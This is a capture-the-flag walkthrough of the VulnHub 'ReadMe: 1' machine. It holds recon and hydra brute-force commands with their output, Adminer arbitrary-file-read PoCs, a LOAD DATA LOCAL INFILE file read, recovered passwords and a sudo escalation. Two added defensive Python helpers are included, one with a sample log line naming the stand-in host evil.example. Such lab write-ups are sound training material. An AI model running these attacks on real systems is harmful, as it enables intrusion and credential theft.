ReadMe: 1 ~ VulnHub
Information gathering
Identifying the target IP
Kali and the target are on the same network, so the target is either 192.168.211.131 or 192.168.211.13
Identifying open ports
Scan the ports with nmap
nmap -sS -sV -p- -T5 192.168.211.131
This confirms the target IP is 192.168.211.131, with ports 22, 80 and 3306 open
Visiting the web page (port 80): nothing interesting in the F12 developer tools either
dirsearch / dirb directory scan
The directory scan turns up adminer.php, reminder.php, info.php and index.html
┌──(root💀kali)-[~]
└─# dirsearch -u http://192.168.211.131/ -w /home/kali/Desktop/dicc.txt -t 100
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 100 | Wordlist size: 11462
Output File: /root/reports/http_192.168.211.131/__24-07-21_09-07-22.txt
Target: http://192.168.211.131/
[09:07:22] Starting:
[09:07:23] 403 - 280B - /.ht_wsr.txt
[09:07:23] 403 - 280B - /.htaccess.bak1
[09:07:23] 403 - 280B - /.htaccess.save
[09:07:23] 403 - 280B - /.htaccess.orig
[09:07:23] 403 - 280B - /.htaccess_orig
[09:07:23] 403 - 280B - /.htaccess_extra
[09:07:23] 403 - 280B - /.htaccess_sc
[09:07:23] 403 - 280B - /.htaccessOLD
[09:07:23] 403 - 280B - /.htaccessOLD2
[09:07:23] 403 - 280B - /.html
[09:07:23] 403 - 280B - /.httr-oauth
[09:07:23] 403 - 280B - /.htpasswd_test
[09:07:23] 403 - 280B - /.htaccess.sample
[09:07:23] 403 - 280B - /.htaccessBAK
[09:07:23] 403 - 280B - /.htm
[09:07:23] 403 - 280B - /.htpasswds
[09:07:23] 403 - 280B - /.php
[09:07:28] 200 - 1020B - /adminer.php
[09:07:37] 200 - 24KB - /info.php
[09:07:43] 200 - 524B - /reminder.php
[09:07:43] 403 - 280B - /server-status
[09:07:43] 403 - 280B - /server-status/
Task Completed
┌──(root💀kali)-[/home/kali/Downloads]
└─# dirb 'http://192.168.211.131' -p "http://192.168.211.131:80"
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jul 22 10:41:49 2024
URL_BASE: http://192.168.211.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.211.131:80
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.211.131/ ----
+ http://192.168.211.131/index.html (CODE:200|SIZE:10918)
+ http://192.168.211.131/info.php (CODE:200|SIZE:91243)
+ http://192.168.211.131/server-status (CODE:403|SIZE:280)
-----------------
END_TIME: Mon Jul 22 10:41:52 2024
DOWNLOADED: 4612 - FOUND: 3
Directory scan results
- adminer.php: turns out to be an Adminer arbitrary file read vulnerability
- info.php reveals some absolute paths
- reminder.php: a person's name, julian, can be collected here. From here one can guess the new page mentioned in their "phone call", that-place-where-i-put-that-thing-that-time/, or get that-place-where-i-put-that-thing-that-time/ directly from the image path
- index.html
nikto
┌──(root💀kali)-[/home/kali]
└─# nikto -h 192.168.211.131
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.211.131
+ Target Hostname: 192.168.211.131
+ Target Port: 80
+ Start Time: 2024-07-20 00:55:04 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5892cd2b735b6, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST .
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ 8102 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2024-07-20 00:55:19 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
whatweb
Fingerprint the site; no framework is detected
┌──(root💀kali)-[/home/kali]
└─# whatweb -v 192.168.211.131
WhatWeb report for http://192.168.211.131
Status : 200 OK
Title : Apache2 Ubuntu Default Page: It works
IP : 192.168.211.131
Country : RESERVED, ZZ
Summary : Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.29 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.29 (Ubuntu) (from server string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Sat, 20 Jul 2024 04:59:06 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sat, 18 May 2019 17:28:10 GMT
ETag: "2aa6-5892cd2b735b6-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3138
Connection: close
Content-Type: text/html
┌──(root💀kali)-[~]
└─# whatweb "http://192.168.211.131/reminder.php"
http://192.168.211.131/reminder.php [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[192.168.211.131]
web
Exploiting the Adminer arbitrary file read vulnerability via adminer.php
How the Adminer vulnerability works:
The Adminer arbitrary file read vulnerability actually stems from the MySQL "LOAD DATA INFILE" security issue; the LOAD DATA LOCAL INFILE problem was fixed in Adminer 4.6.3.
Try hydra to brute-force a weak login
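Added example (not part of this write-up): detection logic a defender could run over Apache access logs to spot Adminer sessions whose `server` parameter points the web server's MySQL client at a host other than the local database, which is the precondition for the LOAD DATA LOCAL file read described above. It assumes Adminer carries `server` and `username` in its query string after login; the log lines and the trusted-host set are constructed.

```python
import re
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" access-log lines (not captured from the target box).
SAMPLE_LOG = """\
192.168.211.132 - - [21/Jul/2024:05:20:01 -0400] "GET /adminer.php HTTP/1.1" 200 1020 "-" "Mozilla/5.0"
192.168.211.132 - - [21/Jul/2024:05:20:09 -0400] "GET /adminer.php?server=localhost&username=julian HTTP/1.1" 200 4302 "-" "Mozilla/5.0"
192.168.211.132 - - [21/Jul/2024:05:21:44 -0400] "GET /adminer.php?server=192.168.211.132&username=fileread_%2Fetc%2Fpasswd HTTP/1.1" 200 4302 "-" "Mozilla/5.0"
192.168.211.132 - - [21/Jul/2024:05:22:10 -0400] "GET /adminer.php?server=evil.example%3A3306&username=root HTTP/1.1" 200 4302 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TRUSTED_DB_HOSTS = {"localhost", "127.0.0.1", "::1"}  # assumption: the web app should only use the local DB

def is_trusted_db_host(server: str) -> bool:
    """Strip an optional :port and decide whether the DB host is the local server."""
    host = server.rsplit(":", 1)[0] if server.count(":") == 1 else server
    if host in TRUSTED_DB_HOSTS:
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False

def find_adminer_external_logins(log_text: str) -> list:
    """Return Adminer requests whose 'server' parameter points at a non-local DB host."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["path"])
        if not url.path.endswith("adminer.php"):
            continue
        params = parse_qs(url.query)
        server = params.get("server", [""])[0]
        if not server or is_trusted_db_host(server):
            continue  # no DB host in the URL, or the local database: benign
        username = params.get("username", [""])[0]
        findings.append({
            "src": m["src"], "ts": m["ts"], "server": server, "username": username,
            # the rogue MySQL server used in the write-up encodes the file to read in the username
            "fileread_convention": username.startswith("fileread_"),
        })
    return findings

if __name__ == "__main__":
    for hit in find_adminer_external_logins(SAMPLE_LOG):
        print(hit)
```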
┌──(root💀kali)-[/home/kali/Desktop]
└─# hydra -L usernames.txt -P passlist.txt -t 4 -vV -f 192.168.211.131 http-get /adminer.php
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-21 05:17:02
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 106776327975 login tries (l:81475/p:1310541), ~26694081994 tries per task
[DATA] attacking http-get://192.168.211.131:80/adminer.php
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 192.168.211.131 - login "3d" - pass "!!!4545" - 1 of 106776327975 [child 0] (0/0)
[ATTEMPT] target 192.168.211.131 - login "3d" - pass "!"�123" - 2 of 106776327975 [child 1] (0/0)
[ATTEMPT] target 192.168.211.131 - login "3d" - pass "!"�;1234" - 3 of 106776327975 [child 2] (0/0)
[ATTEMPT] target 192.168.211.131 - login "3d" - pass "!"��")" - 4 of 106776327975 [child 3] (0/0)
[80][http-get] host: 192.168.211.131 login: 3d password: !"�;1234
[STATUS] attack finished for 192.168.211.131 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-21 05:17:12
Got: **[80][http-get] host: 192.168.211.131 login: 3d password: !"�;1234**
After logging in, the connection to this IP is refused
msfconsole
Searching for it directly doesn't really work either...
fake-mysql-cli/gui
Download link: https://github.com/sobinge/mysql-fake-server-gui
Use fake-mysql-cli or fake-mysql-gui to start a malicious MySQL server
Fill in the malicious server address and the username fileread_/etc/passwd
But neither the GUI nor the CLI version succeeded
PoC
Attack directly with CVE-2021-43008
https://github.com/p0dalirius/CVE-2021-43008-AdminerRead?tab=readme-ov-file
Downloading AdminerRead and its help output
┌──(root💀kali)-[~]
└─# git clone https://github.com/p0dalirius/AdminerRead 7 ⨯
正克隆到 'AdminerRead'...
remote: Enumerating objects: 61, done.
remote: Counting objects: 100% (34/34), done.
remote: Compressing objects: 100% (32/32), done.
remote: Total 61 (delta 18), reused 5 (delta 1), pack-reused 27
接收对象中: 100% (61/61), 1.78 MiB | 1.38 MiB/s, 完成.
处理 delta 中: 100% (19/19), 完成.
┌──(root💀kali)-[~/AdminerRead]
└─# chmod +x AdminerRead.py
┌──(root💀kali)-[~/AdminerRead]
└─# ./AdminerRead.py -h
_ _ _ ____ _
/ \ __| |_ __ ___ (_)_ __ ___ _ __| _ \ ___ __ _ __| |
/ _ \ / _` | '_ ` _ \| | '_ \ / _ \ '__| |_) / _ \/ _` |/ _` |
/ ___ \ (_| | | | | | | | | | | __/ | | _ < __/ (_| | (_| |
/_/ \_\__,_|_| |_| |_|_|_| |_|\___|_| |_| \_\___|\__,_|\__,_| v1.1.0
usage: AdminerRead.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] -I DB_IP [-P DB_PORT] [-u DB_USERNAME]
[-p DB_PASSWORD] [-D DUMP_DIR] [-k]
options:
-h, --help show this help message and exit
-v, --verbose Verbose mode
-s, --only-success Only print successful read file attempts.
-t TARGET_URL, --target TARGET_URL
URL of the Adminer to connect to.
-f FILE, --file FILE Remote file to read.
-F FILELIST, --filelist FILELIST
File containing a list of paths to files to read remotely.
-I DB_IP, --db-ip DB_IP
Remote database IP where the Adminer will connect to.
-P DB_PORT, --db-port DB_PORT
Remote database port where the Adminer will connect to.
-u DB_USERNAME, --db-username DB_USERNAME
Remote database username.
-p DB_PASSWORD, --db-password DB_PASSWORD
Remote database password.
-D DUMP_DIR, --dump-dir DUMP_DIR
Directory where the dumped files will be stored.
-k, --insecure Allow insecure server connections when using SSL (default: False)
Using AdminerRead
┌──(root💀kali)-[~/AdminerRead]
└─# ./AdminerRead.py -I 192.168.211.132 -t http://192.168.211.131/adminer.php -f /etc/passwd
_ _ _ ____ _
/ \ __| |_ __ ___ (_)_ __ ___ _ __| _ \ ___ __ _ __| |
/ _ \ / _` | '_ ` _ \| | '_ \ / _ \ '__| |_) / _ \/ _` |/ _` |
/ ___ \ (_| | | | | | | | | | | __/ | | _ < __/ (_| | (_| |
/_/ \_\__,_|_| |_| |_|_|_| |_|\___|_| |_| \_\___|\__,_|\__,_| v1.1.0
[>] Remote Adminer version : v4.4.0
[!] Connection refused
[!] (==error==) /etc/passwd
cve_2020_10977.py
Try another arbitrary file read PoC: thewhiteh4t/cve-2020-10977: GitLab 12.9.0 Arbitrary File Read (github.com)
┌──(root💀kali)-[/home/kali/Desktop]
└─# python3 cve_2020_10977.py http://192.168.211.131 twh p4ssw0rd
----------------------------------
--- CVE-2020-10977 ---------------
--- GitLab Arbitrary File Read ---
--- 12.9.0 & Below ---------------
----------------------------------
[>] Found By : vakzz [ https://hackerone.com/reports/827052 ]
[>] PoC By : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[+] Target : http://192.168.211.131
[+] Username : twh
[+] Password : p4ssw0rd
[+] Project Names : ProjectOne, ProjectTwo
[!] Trying to Login...
[-] Status : 404
Doesn't work either
searchsploit
Use Kali's built-in searchsploit to look for vulnerabilities and see whether there is anything
┌──(root💀kali)-[/home/kali]
└─# searchsploit adminer
------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------- ---------------------------------
Adminer 4.3.1 - Server-Side Request Forgery | php/webapps/43593.txt
------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root💀kali)-[/home/kali]
└─# cat /usr/share/exploitdb/exploits/php/webapps/43593.txt
Result:
!!!!! It only covers <=4.3.1, and from the earlier output we know the Adminer on this box is 4.4.0
sqlmap
sqlmap didn't get anything out of adminer.php either
reminder.php has a username input field,
sqlmap -r 1.txt
sqlmap -r found no data, so SQL injection is ruled out as well
mysql
Approach: create a database, connect Adminer to it, then follow the Adminer arbitrary file read technique
(For the reasoning behind this approach see the article "Adminer 任意文件读取漏洞 - Wiki (96.mk)")
Creating it
CREATE DATABASE mydatabase; -- create a database named "mydatabase"
SELECT host, user FROM mysql.user; -- verify
Read the data: create a table named "123"
SSH password
Then log in on the Adminer page
Combined with the path revealed earlier, /etc/julian.txt
Enter the statement directly: LOAD DATA LOCAL INFILE '/etc/julian.txt' INTO TABLE `123`;
Seeing "affected" means it worked; refresh the database to get the SSH password
Using the MySQL database created above,
SHOW GLOBAL VARIABLES LIKE 'local_infile';
checks whether loading data from the client's local file system into a database table is enabled
If the setting is enabled, the following output is shown:
mysql> SHOW GLOBAL VARIABLES LIKE 'local_infile';
+---------------+-------+
| Variable_name | Value |
+---------------+-------+
| local_infile  | ON    |
+---------------+-------+
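Added example (not from the write-up): an audit helper that parses the SHOW GLOBAL VARIABLES table above and the [mysqld] section of a my.cnf to report whether local_infile is on, and checks an Adminer version string against the 4.6.3 fix the write-up mentions. The sample outputs and config text are constructed; the assumed default (ON on MySQL 5.7, OFF on 8.0) is a parameter.

```python
import configparser

# Constructed sample inputs (not captured from the target box).
SHOW_OUTPUT = """\
+---------------+-------+
| Variable_name | Value |
+---------------+-------+
| local_infile  | ON    |
+---------------+-------+
"""
WEAK_CNF = "[mysqld]\nbind-address = 127.0.0.1\nlocal-infile\n"        # bare option == ON
HARDENED_CNF = "[mysqld]\nbind-address = 127.0.0.1\nlocal_infile = 0\n"  # what a hardened server sets
ADMINER_FIXED = (4, 6, 3)  # the write-up states this version fixed LOAD DATA LOCAL INFILE

def parse_show_variables(text: str) -> dict:
    """Parse the ASCII table the mysql client prints for SHOW VARIABLES into {name: value}."""
    out = {}
    for line in text.splitlines():
        if not line.startswith("|"):
            continue  # border lines (+---+) carry no data
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) == 2 and cells[0] != "Variable_name":
            out[cells[0]] = cells[1]
    return out

def local_infile_from_show(text: str) -> bool:
    return parse_show_variables(text).get("local_infile", "OFF").upper() in ("ON", "1")

def local_infile_from_cnf(text: str, default_on: bool = True) -> bool:
    """Evaluate the [mysqld] section of a my.cnf; MySQL 5.7 defaults to ON, 8.0 to OFF (assumed)."""
    cp = configparser.ConfigParser(allow_no_value=True, strict=False, interpolation=None)
    cp.read_string(text)
    if not cp.has_section("mysqld"):
        return default_on
    opts = {k.replace("-", "_"): v for k, v in cp.items("mysqld")}  # MySQL accepts - or _
    if "skip_local_infile" in opts:
        return False
    if "local_infile" not in opts:
        return default_on
    value = opts["local_infile"]
    return value is None or value.strip().upper() in ("1", "ON", "TRUE")

def adminer_has_fix(version: str) -> bool:
    """Compare an Adminer version string such as 'v4.4.0' against the fixed release."""
    parts = tuple(int(p) for p in version.lstrip("v").split(".")[:3])
    return parts >= ADMINER_FIXED
```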
Got the flag
Just in case, also check ls -la
Privilege escalation
Direct privilege escalation clearly doesn't work; look for another user
- After authenticating as julian, the user can see the contents of tatham's home directory; tatham looks like a sudo user, and tatham's SSH password is there: So...YouFiguredOutHowToRecoverThisHuh?GGWPnoRE
- But changing the password directly failed, so we still need to go further and find the root password
poc.c is given directly, which means the flag isn't far away
Going into /home, there are two accounts including our own, so tatham is confirmed to be a sudo user
Run sudo -s directly (method 1: experience)
The password is tatham's SSH password
gcc (method 2)
poc.c is given directly, meaning the flag isn't far away; compile it with gcc to get U28uLi5Zb3VGaWd1cmVkT3V0SG93VG9SZWNvdmVyVGhpc0h1aD9HR1dQbm9SRQ==
Then base64-decode it to get So...YouFiguredOutHowToRecoverThisHuh?GGWPnoRE
Done!